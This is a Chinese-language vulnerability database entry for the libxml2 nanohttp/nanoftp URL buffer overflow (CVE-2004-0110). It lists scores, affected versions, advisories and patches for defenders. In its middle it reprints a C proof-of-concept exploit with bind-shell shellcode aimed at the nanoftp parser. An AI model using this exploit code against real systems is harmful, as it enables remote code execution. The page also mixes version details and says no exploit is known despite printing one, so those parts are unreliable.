CVE-2004-0110
CVSS7.5
发布时间 :2004-03-15 00:00:00
修订时间 :2016-10-17 22:40:57
NMCOES    

[原文]Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execute arbitrary code via a long URL.


[CNNVD]Libxml2远程URI解析缓冲区溢出漏洞(CNNVD-200403-056)

        
        libxml2是一款处理XML文件的库。
        libxml2没有正确处理超长URL,远程攻击者可以利用这个漏洞使libxml2发生缓冲区溢出,精心构建URI数据可能以调用libxml2进程权限执行任意指令。
        当通过FTP或HTTP抓取远程资源时,libxml2使用特殊的解析函数,这个函数如果处理超长URL时会发生缓冲区溢出,如果攻击者构建特殊的URI可能以调用libxml2库进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:sgi:propack:2.3SGI ProPack 2.3
cpe:/a:xmlsoft:libxml2:2.5.11XMLSoft Libxml2 2.5.11
cpe:/a:xmlsoft:libxml2:2.6.5XMLSoft Libxml2 2.6.5
cpe:/a:xmlsoft:libxml2:2.6.4XMLSoft Libxml2 2.6.4
cpe:/a:xmlsoft:libxml2:2.4.23XMLSoft Libxml2 2.4.23
cpe:/a:xmlsoft:libxml2:2.5.10Xmlsoft Libxml2 2.5.10
cpe:/a:xmlsoft:libxml2:2.4.19XMLSoft Libxml2 2.4.19
cpe:/a:xmlsoft:libxml2:2.6.1XMLSoft Libxml2 2.6.1
cpe:/a:xmlsoft:libxml2:2.6.0XMLSoft Libxml2 2.6.0
cpe:/a:xmlsoft:libxml2:2.5.4XMLSoft Libxml2 2.5.4
cpe:/a:xmlsoft:libxml2:2.6.3XMLSoft Libxml2 2.6.3
cpe:/a:xmlsoft:libxml2:2.6.2XMLSoft Libxml2 2.6.2
cpe:/a:sgi:propack:2.4SGI ProPack 2.4
cpe:/a:xmlsoft:libxml:1.8.17

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:875XMLSoft Libxml2 Code Execution Vulnerability
oval:org.mitre.oval:def:833XMLSoft Libxml2 Code Execution Vulnerability
oval:org.mitre.oval:def:11626Buffer overflow in the (1) nanohttp or (2) nanoftp modules in XMLSoft Libxml 2 (Libxml2) 2.6.0 through 2.6.5 allow remote attackers to execu...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0110
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0110
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-056
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107851606605420&w=2
(UNKNOWN)  BUGTRAQ  20040305 [OpenPKG-SA-2004.003] OpenPKG Security Advisory (libxml)
http://marc.info/?l=bugtraq&m=107860178228804&w=2
(UNKNOWN)  BUGTRAQ  20040306 TSLSA-2004-0010 - libxml2
http://rhn.redhat.com/errata/RHSA-2004-090.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:090
http://security.gentoo.org/glsa/glsa-200403-01.xml
(UNKNOWN)  GENTOO  GLSA-200403-01
http://www.ciac.org/ciac/bulletins/o-086.shtml
(UNKNOWN)  CIAC  O-086
http://www.debian.org/security/2004/dsa-455
(UNKNOWN)  DEBIAN  DSA-455
http://www.kb.cert.org/vuls/id/493966
(UNKNOWN)  CERT-VN  VU#493966
http://www.novell.com/linux/security/advisories/2005_01_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:001
http://www.redhat.com/support/errata/RHSA-2004-091.html
(UNKNOWN)  REDHAT  RHSA-2004:091
http://www.redhat.com/support/errata/RHSA-2004-650.html
(UNKNOWN)  REDHAT  RHSA-2004:650
http://www.securityfocus.com/bid/9718
(VENDOR_ADVISORY)  BID  9718
http://www.xmlsoft.org/news.html
(UNKNOWN)  CONFIRM  http://www.xmlsoft.org/news.html
http://xforce.iss.net/xforce/xfdb/15301
(VENDOR_ADVISORY)  XF  libxml2-nanohttp-bo(15301)
http://xforce.iss.net/xforce/xfdb/15302
(UNKNOWN)  XF  libxml2-nanoftp-bo(15302)

- 漏洞信息

Libxml2远程URI解析缓冲区溢出漏洞
高危 边界条件错误
2004-03-15 00:00:00 2005-10-20 00:00:00
远程  
        
        libxml2是一款处理XML文件的库。
        libxml2没有正确处理超长URL,远程攻击者可以利用这个漏洞使libxml2发生缓冲区溢出,精心构建URI数据可能以调用libxml2进程权限执行任意指令。
        当通过FTP或HTTP抓取远程资源时,libxml2使用特殊的解析函数,这个函数如果处理超长URL时会发生缓冲区溢出,如果攻击者构建特殊的URI可能以调用libxml2库进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2004:091-01)以及相应补丁:
        RHSA-2004:091-01:Updated libxml2 packages fix security vulnerability
        链接:https://www.redhat.com/support/errata/RHSA-2004-091.html
        补丁下载:
        Red Hat Linux 9:
        SRPMS:
        ftp://updates.redhat.com/9/en/os/SRPMS/libxml2-2.5.4-2.src.rpm
        i386:
        ftp://updates.redhat.com/9/en/os/i386/libxml2-2.5.4-2.i386.rpm
        ftp://updates.redhat.com/9/en/os/i386/libxml2-devel-2.5.4-2.i386.rpm
        ftp://updates.redhat.com/9/en/os/i386/libxml2-python-2.5.4-2.i386.rpm
        XMLSoft
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        XMLSoft Upgrade Libxml 2.6.6
        ftp://xmlsoft.org/

- 漏洞信息 (601)

libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit (EDBID:601)
linux local
2004-10-26 Verified
0 infamous41md
N/A [点击下载]
/*
 *  libxml 2.6.12 nanoftp bof POC   infamous42mdAThotpopDOTcom
 *
 *  [n00b localho outernet] gcc -Wall libsuxml.c -lxml2
 *  [n00b localho outernet] ./a.out 
 *  Usage: ./a.out <retaddr> [ align ]
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  [n00b localho outernet] ./a.out 0xbfff0360
 *  xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN   
  
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <libxml/nanoftp.h>

#define die(x) do{ perror((x)); exit(1); }while(0)
#define BS 0x10000
#define NOP 0x90
#define NNOPS 3000
#define ALIGN 0

/* call them */
#define SHELL_LEN (sizeof(sc)-1)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
    
 
/*
 */
int main(int argc, char **argv)
{
    int x = 0, len = 0;
    char    buf[BS] = {'A',};
    long    retaddr = 0, align = ALIGN;

    if(argc < 2){
        fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(sscanf(argv[1], "%lx", &retaddr) != 1)
        die("sscanf");
    if(argc > 2)
        align = atoi(argv[2]);
    if(align < 0 || align > 3)
        die("nice try newblar");

    strncpy(buf, "://[", 4);
    len += 4;
    memset(buf+len, NOP, NNOPS);
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);
    len += SHELL_LEN;
    
    len += align;
    for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))
        memcpy(buf+len+x, &retaddr, sizeof(retaddr));
    buf[len+x] = ']';
    buf[len+x+1] = 0;

    xmlNanoFTPNewCtxt(buf);

    return EXIT_SUCCESS;
}

// milw0rm.com [2004-10-26]
		

- 漏洞信息

4032
Libxml2 nanohttp.c URI Parsing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Unknown Vendor Verified

- 漏洞描述

A remote overflow exists in Libxml2. The nanohttp daemon fails to perform proper bounds checking, resulting in a buffer overflow. With a specially crafted overly-long request URI, reportedly about 4096 bytes, an attacker can potentially execute arbitrary code resulting in a loss of possible unauthorized remote access.

- 时间线

2004-02-12 Unknow
Unknow 2004-02-12

- 解决方案

It has been reported that this issue has been fixed. Upgrade to version 2.6.6, or higher, to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

libxml2 Remote URI Parsing Buffer Overrun Vulnerability
Boundary Condition Error 9718
Yes No
2004-02-12 12:00:00 2009-08-21 03:54:00
Discovery of this issue is credited to Yuuichi Teranishi.

- 受影响的程序版本

XMLSoft Libxml2 2.6.5
XMLSoft Libxml2 2.6.4
XMLSoft Libxml2 2.6.3
XMLSoft Libxml2 2.6.2
XMLSoft Libxml2 2.6.1
XMLSoft Libxml2 2.6 .0
XMLSoft Libxml2 2.5.11
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
XMLSoft Libxml2 2.5.10
+ Trustix Secure Linux 2.0
XMLSoft Libxml2 2.5.8
XMLSoft Libxml2 2.5.4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
XMLSoft Libxml2 2.5.1
+ Conectiva Linux 9.0
XMLSoft Libxml2 2.4.23
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
XMLSoft Libxml2 2.4.19
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
XMLSoft Libxml2 2.4.12
+ Conectiva Linux 8.0
XMLSoft Libxml 1.8.17
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 7
+ Linux kernel 2.4.19
SGI ProPack 3.0
SGI ProPack 2.4
SGI ProPack 2.3
SGI Advanced Linux Environment 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Linux 7.3 i686
RedHat Linux 7.3 i386
RedHat Linux 7.3
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora 11
Red Hat Fedora 10
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Apple Mac OS X Server 10.3.3
Apple Mac OS X 10.3.3
XMLSoft Libxml2 2.6.6

- 不受影响的程序版本

XMLSoft Libxml2 2.6.6

- 漏洞讨论

A remotely exploitable buffer-overrun vulnerability has been reported in libxml2. This issue is caused by insufficient bounds checking in the URI parsing code in the 'nanohttp' and 'nanoftp' modules.

Attackers may exploit this issue to execute arbitrary code.

- 漏洞利用

Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

This issue has been addressed in libxml2 2.6.6.


XMLSoft Libxml 1.8.17

Turbolinux Turbolinux Desktop 10.0

Apple Mac OS X 10.3.3

Apple Mac OS X Server 10.3.3

SGI ProPack 2.3

SGI ProPack 2.4

XMLSoft Libxml2 2.4.12

XMLSoft Libxml2 2.4.19

XMLSoft Libxml2 2.4.23

XMLSoft Libxml2 2.5.1

XMLSoft Libxml2 2.5.10

XMLSoft Libxml2 2.5.11

XMLSoft Libxml2 2.5.4

XMLSoft Libxml2 2.5.8

XMLSoft Libxml2 2.6 .0

XMLSoft Libxml2 2.6.1

XMLSoft Libxml2 2.6.2

XMLSoft Libxml2 2.6.3

XMLSoft Libxml2 2.6.4

XMLSoft Libxml2 2.6.5

SGI ProPack 3.0

Turbolinux Turbolinux Server 7.0

Turbolinux Turbolinux Workstation 7.0

Turbolinux Turbolinux Workstation 8.0

Turbolinux Turbolinux Server 8.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站